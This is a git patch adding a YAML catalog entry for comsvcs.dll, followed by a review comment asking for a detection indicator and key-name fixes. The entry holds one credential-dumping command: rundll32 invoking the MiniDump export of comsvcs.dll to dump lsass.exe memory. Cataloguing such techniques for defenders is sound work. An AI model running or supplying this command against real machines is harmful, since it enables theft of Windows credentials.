From dd5df7cf3ef5e449eee5318637a63eb6bbf92c42 Mon Sep 17 00:00:00 2001 From: plowsec Date: Fri, 30 Aug 2019 14:12:46 +0200 Subject: [PATCH] Add Comsvcs.yml: dump lsass via signed DLL. --- yml/OSLibraries/comsvcs.yml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 yml/OSLibraries/comsvcs.yml diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml new file mode 100644 index 0000000..fce212e --- /dev/null +++ b/yml/OSLibraries/comsvcs.yml @@ -0,0 +1,26 @@ +--- +Name: Comsvcs.dll +Description: COM+ Services +Author: +Created: '2019-08-30' +Commands: + - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full" + Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump. + UseCase: Dump Lsass.exe process memory to retrieve credentials. + Category: Dump + Privileges: SYSTEM + MitreID: T1003 + MItreLink: https://attack.mitre.org/wiki/Technique/T1003 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\comsvcs.dll +Code_Sample: + - Code: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ +Detection: + - IOC: +Resources: + - Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ +Acknowledegment: + - Person: modexp (modexp.wordpress.com) + Handle: +--- \ No newline at end of file
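Review bot: the `Detection:` block in the hunk ships with an empty `IOC:` entry, so the entry tells an operator how to dump lsass.exe but gives defenders nothing to hunt for; the `Command:` line already contains a usable indicator (rundll32.exe loading comsvcs.dll with `MiniDump` and a process ID on the command line and writing a dump file), so please either fill the IOC in from that or drop the empty key rather than leave it blank. Two key names also look wrong: `MItreLink` (the neighbouring key is `MitreID`, so this should be `MitreLink`) and `Acknowledegment` (should be `Acknowledgement`); a mis-cased or misspelled key will not be picked up by tooling that consumes these YAML files. `Author:` and `Handle:` are left blank while the acknowledgement names modexp, so either fill them in or remove the empty keys. Minor: in the `Description:` line "which in turns calls" should read "which in turn calls", and the file is added without a trailing newline.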